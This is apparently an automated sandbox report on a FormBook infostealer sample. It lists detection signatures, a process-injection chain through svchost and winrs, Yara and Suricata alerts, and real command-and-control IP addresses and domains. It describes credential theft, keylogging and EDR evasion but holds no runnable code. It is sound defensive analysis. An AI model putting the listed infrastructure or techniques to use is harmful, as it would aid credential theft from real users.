Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
A2028041200SD.exe

Overview

General Information

Sample name:A2028041200SD.exe
Analysis ID:1559171
MD5:65a28cddb97884a94a7c9faef74300c3
SHA1:8cdb55cfbf3b463246bfea5ef3b8e3de34c64149
SHA256:78ccda9ce77fc7adb68fac21cc8019dbdc10fadd481f28f28e0428eb35828fbf
Tags:exeuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • A2028041200SD.exe (PID: 7364 cmdline: "C:\Users\user\Desktop\A2028041200SD.exe" MD5: 65A28CDDB97884A94A7C9FAEF74300C3)
    • svchost.exe (PID: 7788 cmdline: "C:\Users\user\Desktop\A2028041200SD.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • zJGHFZpQDL.exe (PID: 6808 cmdline: "C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • winrs.exe (PID: 7900 cmdline: "C:\Windows\SysWOW64\winrs.exe" MD5: E6C1CE56E6729A0B077C0F2384726B30)
          • firefox.exe (PID: 5980 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000A.00000002.3124723950.0000000002B90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.1391788061.0000000003250000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000A.00000002.3124795821.0000000002BE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000008.00000002.1391861547.0000000005400000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000008.00000002.1390489944.00000000024B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            8.2.svchost.exe.24b0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              8.2.svchost.exe.24b0000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\A2028041200SD.exe", CommandLine: "C:\Users\user\Desktop\A2028041200SD.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\A2028041200SD.exe", ParentImage: C:\Users\user\Desktop\A2028041200SD.exe, ParentProcessId: 7364, ParentProcessName: A2028041200SD.exe, ProcessCommandLine: "C:\Users\user\Desktop\A2028041200SD.exe", ProcessId: 7788, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\A2028041200SD.exe", CommandLine: "C:\Users\user\Desktop\A2028041200SD.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\A2028041200SD.exe", ParentImage: C:\Users\user\Desktop\A2028041200SD.exe, ParentProcessId: 7364, ParentProcessName: A2028041200SD.exe, ProcessCommandLine: "C:\Users\user\Desktop\A2028041200SD.exe", ProcessId: 7788, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T09:22:55.944955+010020507451Malware Command and Control Activity Detected192.168.2.1049847188.114.97.380TCP
                2024-11-20T09:23:20.756097+010020507451Malware Command and Control Activity Detected192.168.2.104997923.167.152.4180TCP
                2024-11-20T09:23:34.156224+010020507451Malware Command and Control Activity Detected192.168.2.104998466.29.132.19480TCP
                2024-11-20T09:23:48.479087+010020507451Malware Command and Control Activity Detected192.168.2.1049988202.92.5.2380TCP
                2024-11-20T09:24:01.854135+010020507451Malware Command and Control Activity Detected192.168.2.1049992194.195.220.4180TCP
                2024-11-20T09:24:16.165792+010020507451Malware Command and Control Activity Detected192.168.2.1049996103.230.159.8680TCP
                2024-11-20T09:24:29.562489+010020507451Malware Command and Control Activity Detected192.168.2.1050000188.114.97.380TCP
                2024-11-20T09:24:43.602677+010020507451Malware Command and Control Activity Detected192.168.2.1050004118.107.250.10380TCP
                2024-11-20T09:24:57.083907+010020507451Malware Command and Control Activity Detected192.168.2.1050008209.74.77.10980TCP
                2024-11-20T09:25:10.505272+010020507451Malware Command and Control Activity Detected192.168.2.1050012188.114.96.380TCP
                2024-11-20T09:25:25.416699+010020507451Malware Command and Control Activity Detected192.168.2.1050016194.245.148.18980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T09:22:55.944955+010028554651A Network Trojan was detected192.168.2.1049847188.114.97.380TCP
                2024-11-20T09:23:20.756097+010028554651A Network Trojan was detected192.168.2.104997923.167.152.4180TCP
                2024-11-20T09:23:34.156224+010028554651A Network Trojan was detected192.168.2.104998466.29.132.19480TCP
                2024-11-20T09:23:48.479087+010028554651A Network Trojan was detected192.168.2.1049988202.92.5.2380TCP
                2024-11-20T09:24:01.854135+010028554651A Network Trojan was detected192.168.2.1049992194.195.220.4180TCP
                2024-11-20T09:24:16.165792+010028554651A Network Trojan was detected192.168.2.1049996103.230.159.8680TCP
                2024-11-20T09:24:29.562489+010028554651A Network Trojan was detected192.168.2.1050000188.114.97.380TCP
                2024-11-20T09:24:43.602677+010028554651A Network Trojan was detected192.168.2.1050004118.107.250.10380TCP
                2024-11-20T09:24:57.083907+010028554651A Network Trojan was detected192.168.2.1050008209.74.77.10980TCP
                2024-11-20T09:25:10.505272+010028554651A Network Trojan was detected192.168.2.1050012188.114.96.380TCP
                2024-11-20T09:25:25.416699+010028554651A Network Trojan was detected192.168.2.1050016194.245.148.18980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T09:23:13.101182+010028554641A Network Trojan was detected192.168.2.104996123.167.152.4180TCP
                2024-11-20T09:23:15.654759+010028554641A Network Trojan was detected192.168.2.104997723.167.152.4180TCP
                2024-11-20T09:23:18.201777+010028554641A Network Trojan was detected192.168.2.104997823.167.152.4180TCP
                2024-11-20T09:23:26.444406+010028554641A Network Trojan was detected192.168.2.104998166.29.132.19480TCP
                2024-11-20T09:23:28.978112+010028554641A Network Trojan was detected192.168.2.104998266.29.132.19480TCP
                2024-11-20T09:23:31.531235+010028554641A Network Trojan was detected192.168.2.104998366.29.132.19480TCP
                2024-11-20T09:23:40.822235+010028554641A Network Trojan was detected192.168.2.1049985202.92.5.2380TCP
                2024-11-20T09:23:43.375631+010028554641A Network Trojan was detected192.168.2.1049986202.92.5.2380TCP
                2024-11-20T09:23:45.900366+010028554641A Network Trojan was detected192.168.2.1049987202.92.5.2380TCP
                2024-11-20T09:23:54.162947+010028554641A Network Trojan was detected192.168.2.1049989194.195.220.4180TCP
                2024-11-20T09:23:56.721604+010028554641A Network Trojan was detected192.168.2.1049990194.195.220.4180TCP
                2024-11-20T09:23:59.262057+010028554641A Network Trojan was detected192.168.2.1049991194.195.220.4180TCP
                2024-11-20T09:24:08.523389+010028554641A Network Trojan was detected192.168.2.1049993103.230.159.8680TCP
                2024-11-20T09:24:11.079279+010028554641A Network Trojan was detected192.168.2.1049994103.230.159.8680TCP
                2024-11-20T09:24:13.633467+010028554641A Network Trojan was detected192.168.2.1049995103.230.159.8680TCP
                2024-11-20T09:24:21.911913+010028554641A Network Trojan was detected192.168.2.1049997188.114.97.380TCP
                2024-11-20T09:24:24.418705+010028554641A Network Trojan was detected192.168.2.1049998188.114.97.380TCP
                2024-11-20T09:24:26.987576+010028554641A Network Trojan was detected192.168.2.1049999188.114.97.380TCP
                2024-11-20T09:24:35.861836+010028554641A Network Trojan was detected192.168.2.1050001118.107.250.10380TCP
                2024-11-20T09:24:38.486167+010028554641A Network Trojan was detected192.168.2.1050002118.107.250.10380TCP
                2024-11-20T09:24:41.033463+010028554641A Network Trojan was detected192.168.2.1050003118.107.250.10380TCP
                2024-11-20T09:24:49.431121+010028554641A Network Trojan was detected192.168.2.1050005209.74.77.10980TCP
                2024-11-20T09:24:51.957863+010028554641A Network Trojan was detected192.168.2.1050006209.74.77.10980TCP
                2024-11-20T09:24:54.511773+010028554641A Network Trojan was detected192.168.2.1050007209.74.77.10980TCP
                2024-11-20T09:25:02.842935+010028554641A Network Trojan was detected192.168.2.1050009188.114.96.380TCP
                2024-11-20T09:25:05.415107+010028554641A Network Trojan was detected192.168.2.1050010188.114.96.380TCP
                2024-11-20T09:25:07.927701+010028554641A Network Trojan was detected192.168.2.1050011188.114.96.380TCP
                2024-11-20T09:25:17.778747+010028554641A Network Trojan was detected192.168.2.1050013194.245.148.18980TCP
                2024-11-20T09:25:20.321559+010028554641A Network Trojan was detected192.168.2.1050014194.245.148.18980TCP
                2024-11-20T09:25:22.867338+010028554641A Network Trojan was detected192.168.2.1050015194.245.148.18980TCP
                2024-11-20T09:25:31.061041+010028554641A Network Trojan was detected192.168.2.1050017199.59.243.22780TCP
                2024-11-20T09:25:33.612403+010028554641A Network Trojan was detected192.168.2.1050018199.59.243.22780TCP
                2024-11-20T09:25:37.379541+010028554641A Network Trojan was detected192.168.2.1050019199.59.243.22780TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: A2028041200SD.exeReversingLabs: Detection: 31%
                Source: Yara matchFile source: 8.2.svchost.exe.24b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.svchost.exe.24b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3124723950.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1391788061.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3124795821.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1391861547.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1390489944.00000000024B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3121706684.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3132931690.0000000008020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3124924415.0000000004A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: A2028041200SD.exeJoe Sandbox ML: detected
                Source: A2028041200SD.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: winrs.pdbGCTL source: svchost.exe, 00000008.00000003.1356648780.0000000002824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1356563813.000000000281B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1356633765.000000000281A000.00000004.00000020.00020000.00000000.sdmp, zJGHFZpQDL.exe, 00000009.00000003.1465092401.0000000000EBF000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zJGHFZpQDL.exe, 00000009.00000002.3122329722.0000000000A8E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: A2028041200SD.exe, 00000000.00000003.1283531173.0000000003550000.00000004.00001000.00020000.00000000.sdmp, A2028041200SD.exe, 00000000.00000003.1285810002.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1391439293.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1391439293.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1288833673.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1290791645.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125013421.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 0000000A.00000003.1394010925.0000000002C5A000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000003.1391554853.0000000002A72000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125013421.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: A2028041200SD.exe, 00000000.00000003.1283531173.0000000003550000.00000004.00001000.00020000.00000000.sdmp, A2028041200SD.exe, 00000000.00000003.1285810002.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.1391439293.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1391439293.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1288833673.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1290791645.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125013421.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 0000000A.00000003.1394010925.0000000002C5A000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000003.1391554853.0000000002A72000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125013421.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: winrs.pdb source: svchost.exe, 00000008.00000003.1356648780.0000000002824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1356563813.000000000281B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1356633765.000000000281A000.00000004.00000020.00020000.00000000.sdmp, zJGHFZpQDL.exe, 00000009.00000003.1465092401.0000000000EBF000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00936CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00936CA9
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_009360DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_009360DD
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_009363F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_009363F9
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0093EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0093EB60
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0093F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0093F5FA
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0093F56F FindFirstFileW,FindClose,0_2_0093F56F
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00941B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00941B2F
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00941C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00941C8A
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00941F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00941F94
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 4x nop then pop edi9_2_08093339
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 4x nop then xor eax, eax9_2_08098BB8

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49847 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49847 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49961 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49977 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49979 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49979 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49981 -> 66.29.132.194:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49982 -> 66.29.132.194:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49987 -> 202.92.5.23:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49983 -> 66.29.132.194:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50006 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49994 -> 103.230.159.86:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49986 -> 202.92.5.23:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49995 -> 103.230.159.86:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50010 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50001 -> 118.107.250.103:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49996 -> 103.230.159.86:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49991 -> 194.195.220.41:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49996 -> 103.230.159.86:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50014 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49990 -> 194.195.220.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49978 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50015 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49985 -> 202.92.5.23:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50017 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50018 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50009 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50003 -> 118.107.250.103:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49997 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49998 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49993 -> 103.230.159.86:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49999 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50013 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:50008 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49989 -> 194.195.220.41:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50008 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:50000 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50000 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49988 -> 202.92.5.23:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49988 -> 202.92.5.23:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50005 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50007 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:50016 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50016 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49984 -> 66.29.132.194:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49984 -> 66.29.132.194:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50011 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49992 -> 194.195.220.41:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49992 -> 194.195.220.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50002 -> 118.107.250.103:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:50004 -> 118.107.250.103:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50004 -> 118.107.250.103:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50019 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:50012 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50012 -> 188.114.96.3:80
                Source: DNS query: www.beylikduzu616161.xyz
                Source: DNS query: www.dating-apps-az-dn5.xyz
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewASN Name: NEXINTO-DE NEXINTO-DE
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
